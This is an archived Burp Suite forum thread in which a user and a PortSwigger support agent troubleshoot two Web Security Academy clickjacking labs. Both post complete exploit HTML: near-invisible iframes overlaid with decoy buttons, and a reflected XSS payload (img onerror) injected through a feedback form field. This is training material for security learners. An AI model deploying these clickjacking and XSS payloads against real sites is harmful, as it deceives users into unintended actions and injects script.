Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Practitioner Clickjacking Labs Not Working - Multistep and Trigger DOM XSS

Kevin | Last updated: Dec 08, 2022 08:09PM UTC

Sorry to raise this issue as I see others have in the past but I cannot get either of the Practitioner Clickjacking labs to solve. Both these exploits appear to align well with the buttons in Chrome, but when I deliver the exploit I get no feedback that the lab as been solved and there is no visit from a Lab IP in the exploit access logs. As an experiment I even tried the suggested values in the solution. These do not align well with the buttons but also do not trigger the lab to be solved. Can you please advise? Thanks. Multistep: <style> iframe { position:relative; width: 500px; height: 600px; opacity: 0.0001; z-index: 2; } .firstClick, .secondClick { position:absolute; top:500px; left:60px; z-index: 1; } .secondClick { top:295px; left:210px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://0a3b0063039b422fc02579e800d60039.web-security-academy.net/my-account"></iframe> DOM XSS: <style> iframe { position:relative; width:1000px; height: 1000px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:810px; left:60px; z-index: 1; } </style> <div>Click me</div> <iframe src=https://0aee00a003c21d1ac5ea42e7009f007d.web-security-academy.net/feedback?name=%3Cimg%20src/onerror=print()%3E&email=12233@hacker.com&subject=test&message=1234></iframe>

Ben, PortSwigger Agent | Last updated: Dec 09, 2022 01:49PM UTC

Hi Kevin, I have just run through both of these labs and been able to solve them, so they do appear to be working as expected. In each case, if you click the 'View exploit' button whilst in the Exploit Server, what do you see? Do the values that you have used for each element line up with the buttons that need to be clicked by the victim user? If not, you would need to manually adjust the values being used (the values given in the solution are more of a guide rather than an absolute - there is likely to be some adjustments that need to be made in order to successfully line up the elements). If it helps I have used the following to solve the Multistep lab: <style> iframe { position:relative; width:500; height: 700; opacity: 0.1; z-index: 2; } .firstClick, .secondClick { position:absolute; top:490; left:50; z-index: 1; } .secondClick { top:285; left:225; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://0a05003b035d08fcc0c57d6d006700ac.web-security-academy.net/my-account"></iframe> And the following to solve the DOM-based lab: <style> iframe { position:relative; width:500; height: 700; opacity: 0.1; z-index: 2; } div { position:absolute; top:610; left:60; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0a8800cf03562d3cc03103cd00a00015.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>

Kevin | Last updated: Dec 09, 2022 04:53PM UTC

Thanks for the fast reply. My exploit aligns exactly with the buttons in the Burp browser and in Chrome from what I see on my side. If I could I would provide a screen shot. The code you provided does not align for me, but I just tried to submit it as experiment and it does not work either. Should I see a request from the automated page visit once I deliver the exploit? I do not see a different IP from mine in the exploit access log after I deliver the exploit.

Kevin | Last updated: Dec 09, 2022 05:06PM UTC

It seems like scrolling in the iframe could create issues, but even when I set scrolling="no" and align it perfectly I still don't get it to recognize a solve.

Ben, PortSwigger Agent | Last updated: Dec 12, 2022 08:37AM UTC